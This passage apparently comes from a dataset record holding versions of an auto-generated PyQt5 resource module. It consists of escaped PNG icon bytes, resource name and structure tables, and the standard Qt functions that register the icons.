\\xe2\\xaen\\xcc\\xcc\\x10\\xb7\\xba\\x83\\x84=<\\xbd\\xbc}\\\\A\\x12\\xbe~\\xcc\\x9cL\\x0c\\xfe\\x01\\x81A\\xc1 \\xf1\\x10F.n\\x8e\\xd00\\xa0DxDdT4\\x83h\\x0c\\xc4\\x1cO\\xa0NV\\x1e\\x8eX\\xb0aq\\xf1\\t\\x0c\\x8a\\x89`\\xf1\\xa4\\x10FF\\x06\\x06V\\xa6\\xe4\\x14\\xb0Lj\\x1a\\x83b:D\"\\x03$\\xc1\\xcb\\x94\\x99\\x05\\x96\\xc8Nc\\x10\\xcd\\xc9\\x05\\xcb\\xe4\\x01\\x8d\\xe2\\xe5c\\xce/\\x00K\\xc8I0\\x14\\x16\\x15\\xe7\\x95\\x00%J\\xcb\\x80\\x96\\xf3\\x97W\\x00E+\\xab\"\\xaa%\\xc1\\xce\\xad\\x01i\\xa9\\xad\\xabo\\xc8\\x07\\x89\\xafhlb\\x86x\\xa4\\x19b\\x8dNK+\\xc4\\x9c\\xb6v&\\xb0\\xcf\\xad:\\xd0\\x83\\xa4\\xb3\\x0b,\\xd1\\xdd\\x83.\\xd1\\x0b\\r\\xab\\xbe\\xfe\\x95+\\'L\\x9c\\x04\\x92\\xc8\\x9a<\\x05\\xe8$7f\\x01HDIM\\x9d\\xd6=}\\x06Hb\\xe6\\xac\\xd9s\\xe6\\xba1\\x0b\\nA\\xa3p\\xde|F\\xc6@\\xa0D\\xc1\\x02f\\xe6\\x85\\x8b\\x98\\x05y\\x90\\x13C\\xc0b\\x19Y\\xcbLf`j\\x10\\xe6AI*\\xfe\\x8abK\\x12\\x962\\xc3\\xf8\\x00/\\\\\\xba\\x88\\xe8\\x0b:,\\x00\\x00\\x00%tEXtdate:create\\x002020-07-19T03:39:18+00:00;\\x07G\\xd8\\x00\\x00\\x00%tEXtdate:modify\\x002020-05-02T01:28:55+00:00H\\x1ew\\xe4\\x00\\x00\\x00 tEXtsoftware\\x00https://imagemagick.org\\xbc\\xcf\\x1d\\x9d\\x00\\x00\\x00ctEXtsvg:comment\\x00 Generator: Adobe Illustrator 19.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) \\xceH\\x90\\x0b\\x00\\x00\\x00\\x18tEXtThumb::Document::Pages\\x001\\xa7\\xff\\xbb/\\x00\\x00\\x00\\x18tEXtThumb::Image::Height\\x00587.%\\x1cG\\x00\\x00\\x00\\x17tEXtThumb::Image::Width\\x00587\\xbd\\xd4L\\x1a\\x00\\x00\\x00\\x19tEXtThumb::Mimetype\\x00image/png?\\xb2VN\\x00\\x00\\x00\\x17tEXtThumb::MTime\\x001588382935\\x93\\xf3{S\\x00\\x00\\x00\\x12tEXtThumb::Size\\x0032762BPG\\x06\\xdb\\x00\\x00\\x00ZtEXtThumb::URI\\x00file:///data/wwwroot/www.easyicon.net/cdn-img.easyicon.cn/files/125/1257328.png\\xf9g\\xb6\\x19\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\x00\\x00\\x07\\xd2\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x18\\x08\\x06\\x00\\x00\\x00\\xe0w=\\xf8\\x00\\x00\\x00\\x04gAMA\\x00\\x00\\xb1\\x8f\\x0b\\xfca\\x05\\x00\\x00\\x00 cHRM\\x00\\x00z&\\x00\\x00\\x80\\x84\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00u0\\x00\\x00\\xea`\\x00\\x00:\\x98\\x00\\x00\\x17p\\x9c\\xbaQ<\\x00\\x00\\x00\\x06bKGD\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\xa7\\x93\\x00\\x00\\x00\\tpHYs\\x00\\x00\\r\\xd7\\x00\\x00\\r\\xd7\\x01B(\\x9bx\\x00\\x00\\x00\\x07tIME\\x07\\xe4\\t\\x19\\x0804\\x91\\xe1\\x1a\\xae\\x00\\x00\\x05]IDATH\\xc7\\xdd\\x95M\\x88\\x9dW\\x19\\xc7\\x7f\\xef\\xf7}\\xe7\\xde\\xb93\\x99\\xef\\xc9$M\\x1a\\xd3N\\x1d\\x9bYD\\x0c\\xba\\xb0h\\xa0v\\x157\\x8a\\xb80ED\\x10\\xf1\\x03\\\\\\x99M\\x11\\x04\\x17\\x82\\x0b\\x91Z\\xe8\\xca\\x8d\\x90\\xd2\\x9d\\x8a\"\\xb8\\xb2\\xa2B[\\xd2&\\xd1&i\\x12\\x93L\\xe6\\xde\\x99\\xb93s\\xe7~\\xbf\\xf7}\\xcf9\\xcf\\xe3\\xe2\\xdeI\\x8dXq\\xed\\x03\\x7f\\xce\\xe1,\\xce\\xef\\xf9?\\xcfs8\\x1e\\x1f\\x12/\\x7f\\xeb\\x02\\xf1\\xecql\\xb7Iif\\x99\"\\x9c`\\xd0\\xef\\x91\\xed\\xd7\\xf1\\x87\\x1d\\xdez\\xd0\\xe2\\xfc3\\x0b|\\xfb\\x95\\xdf\\xf0\\xdf\"\\xf8O\\x87?\\xff\\xee\\x17\\x90\\xce\\x0e\\xd3\\xab\\x9fd>6\\x95\\x81\\x84\\x9f\\xe8u\\xbb\\xe7\\x8b\\xacw\\xd6\\x137\\x9dR\\xb4\\xfb\\x1a\\x0f\\xe7\\x13\\xcb\\xf9\\xb3O\\xf3\\x87+w>\\x14\\xe0\\xbdr\\xf9u\\xa6\\xaaU\\x96fg\\xa9\\xa4)\\xbe\\xef\\xd3\\xdb\\xba\\xcf\\x9d\\x95\\x17(\\xfd\\xee\\xa5\\xcf\\xde\\xdfn^\\xda\\xddo~\\\\U\\x13\\x0f<g\\x8d\\xf1\\xd5\\xfd-%\\xff\\xc9\\x8f\\xcf\\xd5\\x7f\\xfd\\xdb\\x13?\\xd0x\\xf6\\x18Y\\x96\\xd1\\xedv\\xd9\\xdfo\\xb2Y\\xabq\\xfb\\xf6\\x1d\\xb6\\xb7\\xea\\x84\\x9e\\xe7ya\\x10DI\\x14\\xf9\\xe54\\xf5\\xe3(\\xf2g\\xd6\\xce\\xb2\\xf9\\xfa\\x0f\\x9f\\xbf~\\xb7\\xf6\\xf2 \\xcf\\xcb\\x9f:\\xff\\xc2p\\xe5\\xe4\\xe9\\xe0\\xc1\\x83\\x87\\xfe\\xb5+o\\xe9\\xee\\x83\\xdbg;\\xd6\\xfd\\xe2{\\x7f]\\xbe\\xf4\\x95\\xf3k\\xbf\\xea\\r2\\xf2<\\x17@DEDDU\\xd5\\x01}\\xef\\xa7\\xbf|\\xed\\xa4\\xc0\\x8f\\x82 XL\\xe3$\\xf4}/\\xf2\\x86\\xfdp\\xf3\\xca\\x9fO\\x1dt\\xbbs_\\xfc\\xea7\\xf3\\xd5\\xd5\\xd5\\xa4\\xdd\\xe9\\xf2\\xc6\\x9f\\xfe\\xc2\\xb5\\xbf\\xdf\\xa0\\xdbi\\xd9A\\xedV\\xe8\\x99\\xac7\\xf5\\xc4G\\xeb-\\xe3\\xbb|\\x98K^\\xe4\\xae\\xc8s\\xc9\\xf3B\\xf2<\\xaf[S|\\'\\x0c\\xc3`2+\\xcc\\xf3\\x85\\xb1\\xf3Y6\\xc49\\xc1ooS\\xaf\\xd7\\xf8\\xf4\\xe7\\xbf\\xc4\\xfa\\xb3\\xcf&\\x9e\\x07mU\\xaa\\xd5\\ns3G\\xf0\\x83 \\xcc\\xbaK\\xf46\\xde\\xab\\xec\\xdf\\xb8\\xfet\\x93IT\\x05TQU\\x00Tu\\t\\x95R\\x98&\\t\\xb9q\\xd6\\x88\\xc5Y\\x87\\x88EZ{\\x04I\\xca\\xd2\\xb1\\x13tz}\\xac\\xb38\\x11\\xd2R\\x89\\xead\\x85\\xbc((MN\\xd3\\xf1#\\xc83\\x82\\xb8\\x8c\\x11\\x1d\\x03\\xe4\\x10\\xe0P%4\\x85Q\\x15\\xc1Z\\x8b8A\\xac\\xc5d\\x19~\\x10\\xb2w\\xd0\\xe6\\xee\\xc6C\\x92(\"\\n\\x03\\xc49\\xc20\\xc0\\xf7=\\x02\\xdf\\xc7)8k \\x12T\\x14\\x18\\x03\\x14\\x14\\x05\\x15\\xc2A\\x96!\\xa2\\xe3\\xec\\x05g\\x1d\\x8aG1\\x1c\\xb0\\xf1p\\x93a^P\\x99H\\x99H\\x12\\x0eZm\\xb2l\\x88)\\n\\xac)(\\x86}\\xc0\\xc3\\x89\\xa0\\x87\\xe5QAG\\x16F\\x80~\\x96\\x11\\x04\\x11\\xceZT\\x15\\xe3\\x04\\xa2\\x14\\xc9\\x0746\\xee\\x12\\x97&(\\x8a\\x82,\\x8ei\\xec\\xed\\xd1j\\xb5\\xc9\\x869\\xed\\xdd:\\xc3^\\x87dj\\x0ek\\x05\\xe5\\x10p\\xd8\\x87\\xd1>\\xcc\\xb2!I\\x02\\xce9T\\x15g-R\\xaa\\x12\\xa5e\\x1a\\xb7\\xae\\x82\\x1f2\\xbbr\\x824Ih\\xec\\xee\\x8df}{\\x93\\xbd{7H\\xfc\\x90\\\\\\x13\\xac8\\xfcQ\\xdd\\xc7\\xa5\\xf9\\x17@Q\\x18<?\\xc0Z\\x87\\x8a\\xe0\\xac\\xc5\\x12\\x12.\\x9c\\x84\\xeeu\\xee\\xbf\\xfdGv\\xee-\\x92Vgi\\xee6\\xe86\\x1b\\xf4\\x9b;\\x94\\xf1\\xf8\\xccb\\x99[}\\xc3\\xbd\\xb0J\\xd3\\xf4\\x1f\\xcb^U\\xf1PBc\\x0cA\\x10\\x8c2\\x17\\xc5Z\\x87s\\x0e\\x1bMR9u\\x06}x\\x9b\\xf6\\xd6\\x06;\\xff\\xb8\\x895\\x16Q!*MP\\x89\\'\\xa8\\x86\\xc2z\\xf54\\x13\\xfd\\x9c\\x1b14\\xb2\\xce\\xa3\\xcc\\x0f\\xfb\\x10Zk\\xb1\\xc6b\\x9dC\\x9c\\xe0\\xdc\\x08 \\xcea\\xfd\\x94\\xe0\\xe83\\x1c\\x99=\\x8e\\x1b\\xf6\\x11Q\\x0e\\x0e\\x0e\\xd8\\xda\\xd9\\xe5\\xc0xL\\xf5\\x16XMS>2YF\\xdb\\x82\\xc4\\x8e\\xc6p\\x0c\\x19\\r+\\xa1s\\x0e\\xeb\\x1c\\xceZ\\x9c\\x93\\xb1\\x93\\xf14\\xe9\\xc8\\x91%B\\xa2*\"\\xc2\\xc0\\xb51\\xd6\\x81\\x07\\xef\\x99&\\xa1\\xe7\\xf3\\x84_\\xe6X\\\\AsAKJ#k\\x8f](\\xa1\\xb3\\x0e\\x17\\xd8\\x0f\\xc6\\xd4\\t\"\\x0e\\xeb\\xec\\xbf9\\x921\\xd8\\xa2*xx\\xb4\\xf3\\x1e\\xef\\x8a\\x83d\\x91\\xa3\\x12\\xb3\\xa0\\tJ\\x15-\\t\\x8d\\xac\\xed!\\x82/\\xceyn$\\x8c\\xb18g\\xc7\\xcd\\x1e\\xbb\\xb2n$7Z\\xc5\\xb9\\x0f^\\xacB;\\xef\\xf3\\xcep\\x8b\\xba_ N8R\\xf8\\xacj\\x95\\xc90\\xd1\\xcc\\xe4\\x9eo\\x8a\\xc2\\x16y\\xd16\\x85y\\xfcB\\xebF\\r\\xb7\\xf6\\xd1\\xe5\\xce\\x8d\\\\\\x1e>*U\\xc1\\xf3\\xa0=\\xec\\xf1\\xcep\\x8b\\x9d\\xd8\\xe1\\xfb\\xb0Z\\xda\\xeb-\\x98\\x9dW7\\xb6[\\xb5po\\xabvW\\x94\\x17\\x81sa\\x14\\xaf\\x07a\\xb4\\xe6\\x07\\xe1IU\\xe6\\x14\\x12\\x15yT\\xba\\xc3\\xbd\\xa2x\\x80\\xaa\\xa0\\x825E\\xde\\xa8u\\xda7\\x8b\\xb8{\\xedsK\\xcb\\xd1\\xf2t\\xfd\\xed\\xa7\\x1a\\xf7.\\xbfv\\xf1\\xb9<L\\xcb\\xe5b~\\xf9\\xd8\\x9b_\\xfb\\xfeKo\\x9e\\x9b\\xf2\\xc2\\x99\\xf9\\xc5\\xe9\\x85\\x95\\xe3+\\xe5\\xc9\\xa9\\xd5\\xb8\\x94\\x9e\\x89\\xe2\\xe4L\\x10DO\\xf9A\\xb0\\xec\\xfbAUU\\x02gmnM\\xb1\\x93\\xf5\\xfb\\xef\\x0f\\x07\\xfdw\\x07\\xbd\\xee\\xd5\"\\xcfo\\xd5a\\xf3\\xea\\xfbW\\x9b\\xaa\\x97\\xf3\\x9b\\xcf}\\x9d/\\xff\\xec\\r\\xbc\\xc7\\xbe7\\xcfca\\xe58\\xa7\\xd7\\xd6\\xb9p\\xf1\\x1b\\\\\\xbax\\xc1\\x07*3\\xf3K\\x0b\\xd5#\\xb3\\xa7\\xca\\xd5\\xa9\\xb5<\\xeb/\\xed\\xed\\xd4j\\xfdv\\xe7\\xbe1E\\x03h\\x01\\x9d\\xb1\\xb2\\xf5\\xa3s\\xd2\\xec\\xb5\\xd8\\xecX\\xfe\\xa7\\x08\\xa3\\x88\\'W?\\xc6\\xab\\xbf\\xbf\\x02\\xe0\\x03\\xd1X\\xf1X\\xe1\\xf8\\xfc\\xff4\\xfe\\tP\\xc9\\xce\\x14aj\\x10F\\x00\\x00\\x00%tEXtdate:create\\x002020-07-19T03:39:19+00:00\\x9dpLl\\x00\\x00\\x00%tEXtdate:modify\\x002019-01-08T17:54:06+00:00\\xfa\\xaed\\x88\\x00\\x00\\x00 tEXtsoftware\\x00https://imagemagick.org\\xbc\\xcf\\x1d\\x9d\\x00\\x00\\x00\\x18tEXtThumb::Document::Pages\\x001\\xa7\\xff\\xbb/\\x00\\x00\\x00\\x18tEXtThumb::Image::Height\\x00512\\x8f\\x8dS\\x81\\x00\\x00\\x00\\x17tEXtThumb::Image::Width\\x00512\\x1c|\\x03\\xdc\\x00\\x00\\x00\\x19tEXtThumb::Mimetype\\x00image/png?\\xb2VN\\x00\\x00\\x00\\x17tEXtThumb::MTime\\x001546970046\\xc48\\x95\\x8f\\x00\\x00\\x00\\x13tEXtThumb::Size\\x00152098B\\xe5\\x15\\x0c\\xcb\\x00\\x00\\x00ZtEXtThumb::URI\\x00file:///data/wwwroot/www.easyicon.net/cdn-img.easyicon.cn/files/106/1066238.png9:*\\r\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82'\n )\nqt_resource_name = (\n b'\\x00\\x03\\x00\\x00wG\\x00p\\x00n\\x00g\\x00\\x04\\x00\\x06\\xfa^\\x00i\\x00c\\x00o\\x00n\\x00\\x0b\\x05\\xff\\xda\\x07\\x001\\x001\\x003\\x007\\x002\\x006\\x004\\x00.\\x00p\\x00n\\x00g\\x00\\x0e\\x02\\xd3\\xb9\\x87\\x00d\\x00e\\x00a\\x00l\\x00 \\x00s\\x00m\\x00a\\x00l\\x00l\\x00.\\x00p\\x00n\\x00g\\x00\\x07\\t\\xc7W\\xa7\\x00s\\x00e\\x00t\\x00.\\x00p\\x00n\\x00g\\x00\\x0b\\x0f)N\\xc7\\x00p\\x00r\\x00e\\x00v\\x00i\\x00e\\x00w\\x00.\\x00p\\x00n\\x00g'\n )\nqt_resource_struct_v1 = (\n b'\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x006\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\xe2\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x05\\x91\\x00\\x00\\x00l\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x0c\\xbc'\n )\nqt_resource_struct_v2 = (\n b'\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x006\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\xe2\\x00\\x00\\x01tV\\xe3?\\xc3\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x01h.\\xd5\\xff8\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x05\\x91\\x00\\x00\\x01t\\xc4s:\\x8f\\x00\\x00\\x00l\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x0c\\xbc\\x00\\x00\\x01t\\xc4s\\xadC'\n )\nqt_version = [int(v) for v in QtCore.qVersion().split('.')]\nif qt_version < [5, 8, 0]:\n rcc_version = 1\n qt_resource_struct = qt_resource_struct_v1\nelse:\n rcc_version = 2\n qt_resource_struct = qt_resource_struct_v2\n\n\ndef qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\nqInitResources()\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Resource object code\n#\n# Created by: The Resource Compiler for PyQt5 (Qt v5.15.0)\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore\n\nqt_resource_data = b\"\\\n\\x00\\x00\\x01\\xde\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x28\\x00\\x00\\x00\\x28\\x08\\x06\\x00\\x00\\x00\\x8c\\xfe\\xb8\\x6d\\\n\\x00\\x00\\x01\\xa5\\x49\\x44\\x41\\x54\\x78\\x9c\\xed\\xd8\\x3f\\x6b\\x14\\x41\\\n\\x1c\\x87\\xf1\\x4f\\x42\\x2c\\x8d\\x45\\x88\\x58\\x0b\\x22\\x24\\x20\\xa4\\xb0\\\n\\x49\\xa3\\x28\\x8a\\x08\\xfe\\x69\\x24\\x4d\\xf0\\xcc\\xeb\\x4a\\x61\\x52\\xa8\\\n\\x2f\\xc1\\xca\\x22\\x20\\x36\\x82\\x58\\x59\\x58\\x08\\x2a\\x68\\xa2\\x44\\xc5\\\n\\x34\\x81\\xa8\\x9b\\x62\\x38\\x18\\xe6\\x76\\x6f\\x2f\\x97\\x9d\\x35\\x1c\\xfb\\\n\\xc0\\xc0\\xdd\\xcc\\xee\\xcd\\xb3\\xbf\\xd9\\xfd\\xde\\xdc\\xd1\\xd1\\x71\\x32\\\n\\xb8\\x8f\\xef\\x28\\x8e\\xd8\\xbe\\xe2\\x56\\x1b\\x82\\xdb\\xb8\\x3c\\xc6\\x79\\\n\\x37\\xf0\\xbe\\x61\\x97\\x52\\x8a\\x31\\xcf\\x3b\\x83\\x5f\\x4d\\x8a\\xa4\\x4c\\\n\\xe7\\xfc\\xf0\\x26\\x98\\x78\\xc1\\x7d\\xfc\\x73\\xf4\\x87\\x2b\\x6e\\xdf\\x70\\\n\\xb7\\x6e\\xa2\\x71\\xef\\xc1\\x26\\x58\\xc6\\xa7\\xba\\x83\\xfe\\xa7\\xe0\\xd0\\\n\\xf9\\x27\\xfe\\x1e\\xcc\\xce\\x44\\x08\\xae\\x0a\\x61\\x7c\\x9c\\x27\\xb5\\xae\\\n\\x89\\x5e\\x1f\\x60\\x3d\\x95\\xa8\\xba\\x49\\x67\\xf1\\x03\\x0b\\x23\\x5c\\x48\\\n\\x53\\x9c\\xc3\\xef\\xfe\\x9b\\xba\\x0a\\xae\\xe0\\x05\\xde\\xe5\\x34\\x4a\\xb8\\\n\\x87\\xe7\\x69\\x67\\x55\\x05\\x5f\\xe2\\x4e\\x56\\x9d\\x41\\x5e\\xe1\\x76\\xda\\\n\\x59\\x26\\x78\\x41\\xd8\\x4e\\xcd\\xe4\\x36\\x8a\\xb8\\x88\\x2f\\xf1\\x9c\\xc3\\\n\\x96\\xf8\\x21\\x9e\\xe2\\x4f\\x66\\xa9\\x98\\x1e\\x9e\\x94\\xcd\\x99\\x56\\x70\\\n\\x1a\\x1f\\x71\\xa9\\x05\\xa9\\x78\\xce\\xcf\\x58\\x2c\\x1b\\x4c\\x05\\xaf\\xe1\\\n\\x4d\\x6e\\xa3\\x84\\x9b\\x78\\x9d\\x76\\x56\\x2d\\xf1\\x1a\\x1e\\x67\\xd5\\x19\\\n\\xa4\\x87\\x8d\\xaa\\xc1\\xb8\\x82\\xa7\\x85\\xec\\x9b\\xcf\\x2c\\x14\\x33\\x8b\\\n\\x9f\\x98\\x4b\\x07\\xca\\x2a\\xf8\\x00\\x5b\\xc2\\x8f\\xa8\\xb6\\xe8\\xe7\\xed\\\n\\x6e\\xd5\\x01\\x71\\x05\\xb7\\x84\\xb0\\x6c\\x93\\xda\\xbc\\xed\\x0b\\x9e\\xc7\\\n\\x0e\\x4e\\xe5\\x36\\x8a\\x18\\x9a\\xb7\\xe9\\x12\\xf7\\xf0\\x4c\\xf8\\xc2\\x6e\\\n\\x8b\\x91\\xf2\\xb6\\xc0\\x14\\x3e\\x60\\xa9\\x05\\xa9\\x3e\\x23\\xe7\\x6d\\x81\\\n\\xab\\x78\\x9b\\x59\\x28\\xe5\\xba\\x9a\\xbc\\x8d\\x97\\xb8\\x87\\xcd\\xac\\x3a\\\n\\x83\\x3c\\x32\\x62\\xde\\x16\\x42\\xf6\\x9d\\xcd\\x69\\x13\\x31\\x25\\xfc\\xa7\\\n\\xb3\\xa3\\x24\\xfb\\xca\\xd8\\x93\\x77\\xc7\\x9c\\xb6\\xbf\\xc2\\x1e\\xf3\\xca\\\n\\x31\\x2f\\xb4\\xa3\\xa3\\xe3\\xc4\\x73\\x08\\x28\\x98\\x98\\x24\\xc8\\xdd\\xa5\\\n\\x40\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x03\\xab\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x03\\x00\\x00\\x00\\x28\\x2d\\x0f\\x53\\\n\\x00\\x00\\x00\\x04\\x67\\x41\\x4d\\x41\\x00\\x00\\xb1\\x8f\\x0b\\xfc\\x61\\x05\\\n\\x00\\x00\\x00\\x20\\x63\\x48\\x52\\x4d\\x00\\x00\\x7a\\x26\\x00\\x00\\x80\\x84\\\n\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00\\x75\\x30\\x00\\x00\\xea\\x60\\\n\\x00\\x00\\x3a\\x98\\x00\\x00\\x17\\x70\\x9c\\xba\\x51\\x3c\\x00\\x00\\x00\\x84\\\n\\x50\\x4c\\x54\\x45\\x32\\x37\\x39\\x00\\x00\\x00\\x32\\x37\\x39\\x32\\x37\\x39\\\n\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\\n\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\\n\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\\n\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\\n\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\\n\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\\n\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\x37\\x39\\x32\\\n\\x37\\x39\\x32\\x37\\x39\\xff\\xff\\xff\\xeb\\x7d\\xd9\\x30\\x00\\x00\\x00\\x2a\\\n\\x74\\x52\\x4e\\x53\\x00\\x00\\x2c\\xcf\\xb7\\x01\\x18\\x20\\x1f\\x1c\\x15\\xbd\\\n\\x78\\xc3\\xc1\\x77\\x27\\x31\\x95\\xbe\\x2d\\xdf\\x50\\x22\\x1e\\xca\\xdc\\x24\\\n\\xc2\\x28\\x26\\x32\\x1d\\x11\\xb9\\x4d\\xf4\\x12\\xde\\x4f\\x88\\xe0\\xc4\\x83\\\n\\x03\\xa2\\x00\\x00\\x00\\x01\\x62\\x4b\\x47\\x44\\x2b\\x24\\xb9\\xe4\\x08\\x00\\\n\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\xe4\\x09\\x04\\x02\\x0c\\x2c\\x5e\\x9a\\\n\\xf1\\x93\\x00\\x00\\x00\\x89\\x49\\x44\\x41\\x54\\x18\\xd3\\x55\\xcf\\xd9\\x12\\\n\\x82\\x30\\x10\\x44\\xd1\\x8e\\x18\\x88\\xc8\\xb0\\xb8\\x05\\x01\\x41\\x41\\x41\\\n\\xf3\\xff\\x1f\\x68\\x36\\x04\\xef\\x5b\\x9f\\xaa\\xa9\\x4a\\x80\\x75\\x9b\\x60\\\n\\x0b\\x1e\\x46\\xc2\\x16\\xed\\x78\\xbc\\x57\\x01\\x12\\x4a\\x5d\\x94\\xe5\\xc5\\\n\\xe1\\x78\\xc2\\xf9\\x22\\xa4\\xad\\x2c\\xe8\\x5a\\xc4\\x40\\x25\\xfc\\x7d\\xdd\\\n\\x28\\xba\\x71\\x0d\\x12\\x8c\\xe9\\xdd\\x36\\xaa\\xe9\\xb2\\xbb\\x03\\xb7\\xa9\\\n\\x2e\\x29\\x9a\\xc1\\xec\\x16\\x32\\x9d\\xe1\\xd1\\x9b\\xbd\\x82\\xe1\\xd9\\xeb\\\n\\xbd\\x82\\x7c\\x78\\xe1\\x0f\\x6c\\x6c\\x01\\x9f\\x07\\xb1\\xfc\\x4d\\x18\\x18\\\n\\x27\\xff\\x74\\x29\\xc5\\x44\\x21\\xf0\\x1e\\xab\\x5f\\x9f\\x84\\xe3\\x0b\\x50\\\n\\xe9\\x0c\\xb4\\xd8\\x75\\xd4\\x0e\\x00\\x00\\x00\\x25\\x74\\x45\\x58\\x74\\x64\\\n\\x61\\x74\\x65\\x3a\\x63\\x72\\x65\\x61\\x74\\x65\\x00\\x32\\x30\\x32\\x30\\x2d\\\n\\x30\\x37\\x2d\\x31\\x39\\x54\\x30\\x33\\x3a\\x33\\x39\\x3a\\x32\\x30\\x2b\\x30\\\n\\x30\\x3a\\x30\\x30\\x86\\x67\\x0e\\x5c\\x00\\x00\\x00\\x25\\x74\\x45\\x58\\x74\\\n\\x64\\x61\\x74\\x65\\x3a\\x6d\\x6f\\x64\\x69\\x66\\x79\\x00\\x32\\x30\\x31\\x39\\\n\\x2d\\x30\\x31\\x2d\\x30\\x38\\x54\\x31\\x39\\x3a\\x34\\x39\\x3a\\x34\\x36\\x2b\\\n\\x30\\x30\\x3a\\x30\\x30\\xb0\\x72\\x32\\xb2\\x00\\x00\\x00\\x20\\x74\\x45\\x58\\\n\\x74\\x73\\x6f\\x66\\x74\\x77\\x61\\x72\\x65\\x00\\x68\\x74\\x74\\x70\\x73\\x3a\\\n\\x2f\\x2f\\x69\\x6d\\x61\\x67\\x65\\x6d\\x61\\x67\\x69\\x63\\x6b\\x2e\\x6f\\x72\\\n\\x67\\xbc\\xcf\\x1d\\x9d\\x00\\x00\\x00\\x18\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\\n\\x6d\\x62\\x3a\\x3a\\x44\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x3a\\x3a\\x50\\x61\\\n\\x67\\x65\\x73\\x00\\x31\\xa7\\xff\\xbb\\x2f\\x00\\x00\\x00\\x19\\x74\\x45\\x58\\\n\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x49\\x6d\\x61\\x67\\x65\\x3a\\x3a\\x48\\\n\\x65\\x69\\x67\\x68\\x74\\x00\\x31\\x30\\x36\\x38\\x8a\\xfc\\x51\\x92\\x00\\x00\\\n\\x00\\x18\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x49\\x6d\\x61\\\n\\x67\\x65\\x3a\\x3a\\x57\\x69\\x64\\x74\\x68\\x00\\x31\\x30\\x36\\x38\\x9f\\xb5\\\n\\x8d\\x8b\\x00\\x00\\x00\\x19\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\\n\\x3a\\x4d\\x69\\x6d\\x65\\x74\\x79\\x70\\x65\\x00\\x69\\x6d\\x61\\x67\\x65\\x2f\\\n\\x70\\x6e\\x67\\x3f\\xb2\\x56\\x4e\\x00\\x00\\x00\\x17\\x74\\x45\\x58\\x74\\x54\\\n\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x4d\\x54\\x69\\x6d\\x65\\x00\\x31\\x35\\x34\\x36\\\n\\x39\\x37\\x36\\x39\\x38\\x36\\x42\\x37\\xbe\\xd0\\x00\\x00\\x00\\x12\\x74\\x45\\\n\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\